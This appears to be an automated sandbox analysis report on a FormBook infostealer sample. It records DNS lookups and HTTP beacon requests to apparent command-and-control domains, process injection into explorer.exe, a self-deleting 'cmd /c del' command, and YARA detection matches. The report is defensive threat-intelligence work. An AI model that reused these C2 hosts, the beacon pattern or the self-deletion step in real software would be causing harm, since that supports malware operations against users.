May 12, 2021 10:51:50.073811054 CEST	50463	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:50.426922083 CEST	53	50463	8.8.8.8	192.168.2.5
May 12, 2021 10:51:55.477020979 CEST	50394	53	192.168.2.5	8.8.8.8
May 12, 2021 10:51:55.634638071 CEST	53	50394	8.8.8.8	192.168.2.5
May 12, 2021 10:52:00.478306055 CEST	58530	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:00.552556038 CEST	53	58530	8.8.8.8	192.168.2.5
May 12, 2021 10:52:00.658713102 CEST	53813	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:00.734466076 CEST	53	53813	8.8.8.8	192.168.2.5
May 12, 2021 10:52:05.944026947 CEST	63732	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:06.156783104 CEST	53	63732	8.8.8.8	192.168.2.5
May 12, 2021 10:52:14.610155106 CEST	57344	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:14.668756962 CEST	53	57344	8.8.8.8	192.168.2.5
May 12, 2021 10:52:16.808842897 CEST	54450	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:16.881597996 CEST	53	54450	8.8.8.8	192.168.2.5
May 12, 2021 10:52:29.688509941 CEST	59261	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:29.749356985 CEST	53	59261	8.8.8.8	192.168.2.5
May 12, 2021 10:52:32.259223938 CEST	57151	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:32.325752974 CEST	53	57151	8.8.8.8	192.168.2.5
May 12, 2021 10:52:37.339581966 CEST	59413	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:37.426595926 CEST	53	59413	8.8.8.8	192.168.2.5
May 12, 2021 10:52:43.027828932 CEST	60516	53	192.168.2.5	8.8.8.8
May 12, 2021 10:52:43.431978941 CEST	53	60516	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 10:51:38.331152916 CEST	192.168.2.5	8.8.8.8	0xf483	Standard query (0)	www.couttsagency.com	A (IP address)	IN (0x0001)
May 12, 2021 10:51:44.401118040 CEST	192.168.2.5	8.8.8.8	0x6be2	Standard query (0)	www.industry-automation.com	A (IP address)	IN (0x0001)
May 12, 2021 10:51:50.073811054 CEST	192.168.2.5	8.8.8.8	0x2c2b	Standard query (0)	www.vedgc.com	A (IP address)	IN (0x0001)
May 12, 2021 10:51:55.477020979 CEST	192.168.2.5	8.8.8.8	0xc8d3	Standard query (0)	www.holodov.net	A (IP address)	IN (0x0001)
May 12, 2021 10:52:00.658713102 CEST	192.168.2.5	8.8.8.8	0xea95	Standard query (0)	www.fashionblessings.com	A (IP address)	IN (0x0001)
May 12, 2021 10:52:05.944026947 CEST	192.168.2.5	8.8.8.8	0xcc19	Standard query (0)	www.hjtzzg.com	A (IP address)	IN (0x0001)
May 12, 2021 10:52:29.688509941 CEST	192.168.2.5	8.8.8.8	0x529a	Standard query (0)	www.hjtzzg.com	A (IP address)	IN (0x0001)
May 12, 2021 10:52:32.259223938 CEST	192.168.2.5	8.8.8.8	0x2e9c	Standard query (0)	www.leeindustrles.com	A (IP address)	IN (0x0001)
May 12, 2021 10:52:37.339581966 CEST	192.168.2.5	8.8.8.8	0xf70f	Standard query (0)	www.wcieckashmir.com	A (IP address)	IN (0x0001)
May 12, 2021 10:52:43.027828932 CEST	192.168.2.5	8.8.8.8	0x33c1	Standard query (0)	www.hana-pet.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 10:51:38.482887030 CEST	8.8.8.8	192.168.2.5	0xf483	No error (0)	www.couttsagency.com	couttsagency.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 10:51:38.482887030 CEST	8.8.8.8	192.168.2.5	0xf483	No error (0)	couttsagency.com		162.241.244.112	A (IP address)	IN (0x0001)
May 12, 2021 10:51:44.501290083 CEST	8.8.8.8	192.168.2.5	0x6be2	No error (0)	www.industry-automation.com		52.128.23.153	A (IP address)	IN (0x0001)
May 12, 2021 10:51:50.426922083 CEST	8.8.8.8	192.168.2.5	0x2c2b	Name error (3)	www.vedgc.com	none	none	A (IP address)	IN (0x0001)
May 12, 2021 10:51:55.634638071 CEST	8.8.8.8	192.168.2.5	0xc8d3	No error (0)	www.holodov.net	holodov.net		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 10:52:00.734466076 CEST	8.8.8.8	192.168.2.5	0xea95	No error (0)	www.fashionblessings.com	fashionblessings.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 10:52:00.734466076 CEST	8.8.8.8	192.168.2.5	0xea95	No error (0)	fashionblessings.com		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 10:52:06.156783104 CEST	8.8.8.8	192.168.2.5	0xcc19	No error (0)	www.hjtzzg.com		156.245.135.187	A (IP address)	IN (0x0001)
May 12, 2021 10:52:29.749356985 CEST	8.8.8.8	192.168.2.5	0x529a	No error (0)	www.hjtzzg.com		156.245.135.187	A (IP address)	IN (0x0001)
May 12, 2021 10:52:32.325752974 CEST	8.8.8.8	192.168.2.5	0x2e9c	Name error (3)	www.leeindustrles.com	none	none	A (IP address)	IN (0x0001)
May 12, 2021 10:52:37.426595926 CEST	8.8.8.8	192.168.2.5	0xf70f	No error (0)	www.wcieckashmir.com	wcieckashmir.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 10:52:37.426595926 CEST	8.8.8.8	192.168.2.5	0xf70f	No error (0)	wcieckashmir.com		78.142.63.38	A (IP address)	IN (0x0001)
May 12, 2021 10:52:43.431978941 CEST	8.8.8.8	192.168.2.5	0x33c1	No error (0)	www.hana-pet.com		107.151.118.90	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.couttsagency.com

www.industry-automation.com

www.fashionblessings.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49720	162.241.244.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 10:51:38.652030945 CEST	1414	OUT	GET /sjgd/?F6AD0t=e2SwNy5jTXYhIJXNsx2jjLy0bcCG+bMU9WGMv0QquE/Juv17dG/pwBG3zi56WICLhfuF&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1 Host: www.couttsagency.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 10:51:42.803739071 CEST	1414	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 12 May 2021 08:51:42 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://couttsagency.com/sjgd/?F6AD0t=e2SwNy5jTXYhIJXNsx2jjLy0bcCG+bMU9WGMv0QquE/Juv17dG/pwBG3zi56WICLhfuF&w67=DhrxPvQ0jlAtfdH0 host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: true X-Proxy-Cache: MISS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49721	52.128.23.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 10:51:44.879256010 CEST	1415	OUT	GET /sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1 Host: www.industry-automation.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 10:51:45.066606998 CEST	1416	IN	HTTP/1.1 463 Server: nginx Date: Wed, 12 May 2021 08:51:44 GMT Content-Type: text/html Content-Length: 8915 Connection: close ETag: "5e52ceb0-22d3" X-DIS-Request-ID: 434d3397d3783a81981cfd53904644c0 Set-Cookie: dis-remote-addr=84.17.52.78 Set-Cookie: dis-timestamp=2021-05-12T01:51:44-07:00 Set-Cookie: dis-request-id=434d3397d3783a81981cfd53904644c0 X-Frame-Options: sameorigin
May 12, 2021 10:51:45.066623926 CEST	1417	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"
May 12, 2021 10:51:45.066639900 CEST	1418	IN	Data Raw: 72 63 3d 22 2f 44 4f 41 45 72 72 6f 72 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 5f 74 72 61 6e 73 5f 73 70 61 63 65 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67 68 74 3d 22 31 38 22 Data Ascii: rc="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" alt="" width="18" height="18" /></td> </tr> <tr> <td w
May 12, 2021 10:51:45.066656113 CEST	1420	IN	Data Raw: 50 72 6f 74 65 63 74 69 6f 6e 22 20 74 69 74 6c 65 3d 22 44 4f 53 61 72 72 65 73 74 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 7c 20 44 44 6f 53 20 50 72 6f 74 65 63 74 69 6f 6e 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 0d 0a 20 20 20 Data Ascii: Protection" title="DOSarrest Internet Security \| DDoS Protection" /></a></td> </tr> </table></td> <td width="18"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="55" /></td> </tr> <
May 12, 2021 10:51:45.066670895 CEST	1421	IN	Data Raw: 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 32 31 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 44 4f 41 45 72 72 6f 72 2f 61 73 Data Ascii: <tr> <td width="121" align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="10" height="120" alt=""/></td> <td width="500" align="center" class="errortitle">463</td>
May 12, 2021 10:51:45.066689968 CEST	1422	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 38 37 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 3e 26 6e 62 73 70 3b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 Data Ascii: <td width="187" align="center" valign="top"> </td> <td width="102" align="center" valign="top" class="imagetext">Host<br /><span style="font-size: x-small" id="host2"></span><script>functio
May 12, 2021 10:51:45.066706896 CEST	1423	IN	Data Raw: 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 69 64 5f 66 69 6e 69 73 68 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 69 64 5f 70 72 6f 63 65 73 73 28 22 64 69 73 2d 72 65 71 75 65 73 74 2d 69 64 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 74 64 3e 0d 0a 20 Data Ascii: tElementById("id_finish").innerHTML=id_process("dis-request-id");</script></td> </tr> </tbody> </table></td> <td align="center">\|</td> <td width="30%" a
May 12, 2021 10:51:45.069503069 CEST	1425	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 Data Ascii: </tr> </tbody> </table></td> </tr> <tr> <td align="center"><img src="/DOAError/assets/images/bottom_trans_spacer.png" width="18" height="8" /></td> </tr> <tr>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49728	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 10:52:00.776803017 CEST	5500	OUT	GET /sjgd/?F6AD0t=1PFHXCgs6H1RDCiwx9JNnUIhtMFE4B7sgwhyYm7kgJX0BWSMA5HZMbs3oaApumpuT18L&w67=DhrxPvQ0jlAtfdH0 HTTP/1.1 Host: www.fashionblessings.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 10:52:00.913438082 CEST	5502	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 08:52:00 GMT Content-Type: text/html Content-Length: 275 ETag: "6096ba97-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: in.exe PID: 6236 Parent PID: 5624

General

Start time:	10:50:29
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\in.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\in.exe'
Imagebase:	0x40000
File size:	747520 bytes
MD5 hash:	9904EC065111725685CBE8865BF33E6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: in.exe PID: 6388 Parent PID: 6236

General

Start time:	10:50:32
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\in.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\in.exe
Imagebase:	0x6a0000
File size:	747520 bytes
MD5 hash:	9904EC065111725685CBE8865BF33E6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6388

General

Start time:	10:50:34
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: NETSTAT.EXE PID: 6848 Parent PID: 3472

General

Start time:	10:50:50
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0x7ff797770000
File size:	32768 bytes
MD5 hash:	4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5764 Parent PID: 6848

General

Start time:	10:50:55
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\in.exe'
Imagebase:	0x310000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6036 Parent PID: 5764

General

Start time:	10:50:56
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: in.exe PID: 6236 Parent PID: 5624 in.exeCOMMON

Executed Functions

Function 0233BBB8, Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0233BE0E

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 941369eb12f70e83a3034ddb08f433feda3c74c6985a309143d9ad0c873ea17e
Instruction ID: 25d9f256fa76da15cdce4f6337484bc2aa550b1ef32f2747e3207b60aa25091a
Opcode Fuzzy Hash: 941369eb12f70e83a3034ddb08f433feda3c74c6985a309143d9ad0c873ea17e
Instruction Fuzzy Hash: D8812370A00B058FD725DF2AD05575AB7F6FF88308F008A2ED586DBA40DB75E9468F91

Uniqueness

Uniqueness Score: -1.00%

Function 0233B1E0, Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0233DD8A

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 474728c3b10c30f0dc356a76c234488083cc32416ff6dfacc87de761146d33c1
Instruction ID: 66ea77ccabda98065f786686db6b85460f42123b82f8ac79695a2a9087149af6
Opcode Fuzzy Hash: 474728c3b10c30f0dc356a76c234488083cc32416ff6dfacc87de761146d33c1
Instruction Fuzzy Hash: 2C51E0B1D00358DFDF15CF99C884ADEBBB5BF88314F24822AE819AB214D7709985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0233B1EC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0233DD8A

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0aad7d37dcb835ebe6977ee633aa5127aeff786c5b75764e4924360a7c22c4ee
Instruction ID: 3fdf3a4b3f515b5e7f9836344e9dc11e4d2837dcb7b2164769fc59a195bdaa06
Opcode Fuzzy Hash: 0aad7d37dcb835ebe6977ee633aa5127aeff786c5b75764e4924360a7c22c4ee
Instruction Fuzzy Hash: 7451CEB1D1034C9FDF15CF99C884ADEBBB5BF88314F24822AE819AB214D7709985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0233DC6D, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0233DD8A

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 35c20a433192b77695b6bc71352693756890c4cd6371e37be03f004982898880
Instruction ID: f74175e973c6c61db2ee3a9fc5fe7ba16a214e5b18ce83ba4aecfc74f3fc0e49
Opcode Fuzzy Hash: 35c20a433192b77695b6bc71352693756890c4cd6371e37be03f004982898880
Instruction Fuzzy Hash: 5151E0B1D10348DFDF15CFA9C984ADEBBB5BF48314F24822AE819AB214D7709985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02336D51, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02336E4F

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 60df919ccd86bc2968f546e3db51f393beee0b55e93b1e48669726335e9181c8
Instruction ID: 200e9cc083099e036f0ad3af3c173ce5288ab06e6003fa0a8534cc15c92d1a72
Opcode Fuzzy Hash: 60df919ccd86bc2968f546e3db51f393beee0b55e93b1e48669726335e9181c8
Instruction Fuzzy Hash: 50416A76900248AFCF01CFA9D884ADEBFF5EF49320F14805AEA54A7311C3359915DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02336DC0, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02336E4F

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 06888762d7e613f033409d97ae2a9b2e8c247a01924611bcb025870dc7b4a9f5
Instruction ID: e4712239c4f1c84f51ae44dcef70602b7a3d832fc8a014cc7020146c6b34a033
Opcode Fuzzy Hash: 06888762d7e613f033409d97ae2a9b2e8c247a01924611bcb025870dc7b4a9f5
Instruction Fuzzy Hash: 382103B5900248AFDB10CFA9D584ADEBFF4FB48324F14801AE914A7310D374AA45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02336DC8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02336E4F

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ce0fa32be248f962521184a18aac530627a230140ccdb6888c7a000ffc3cd3bb
Instruction ID: b353d080fa5ceb77f9b2c41549f251223befe0dc416872e079421a4135b766f4
Opcode Fuzzy Hash: ce0fa32be248f962521184a18aac530627a230140ccdb6888c7a000ffc3cd3bb
Instruction Fuzzy Hash: 0521E2B5900248AFDB10CFAAD984ADEBBF8EB48324F14801AE914B3310D374A944DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0233B0B0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0233BE89,00000800,00000000,00000000), ref: 0233C09A

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b7bb76814180a4953bfa9ea44ea3e553e2b8f1f301fb23021d35fb1bb8d71d3c
Instruction ID: 16b455664a97bfc1d1aaa82a69e45fdfd0085027762defaf370d1cba46ae0658
Opcode Fuzzy Hash: b7bb76814180a4953bfa9ea44ea3e553e2b8f1f301fb23021d35fb1bb8d71d3c
Instruction Fuzzy Hash: 3C1103B6D002488FCB10CF9AD444BDEFBF4AB48324F14842AE515B7600C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0233C028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0233BE89,00000800,00000000,00000000), ref: 0233C09A

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eb3dbff426d4dfc9a72f4576033c7d098cd65ae75650f9b2466311d065758dc2
Instruction ID: dfa28c89464f55175bb7da1891b7ba4d907e8954a4e504bfadf8ceac450374e1
Opcode Fuzzy Hash: eb3dbff426d4dfc9a72f4576033c7d098cd65ae75650f9b2466311d065758dc2
Instruction Fuzzy Hash: 801114B6D002498FCB10CF9AD484BDEFBF4EB48324F15851AE919B7200C775A649CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0233BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0233BE0E

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: HandleModule
String ID:
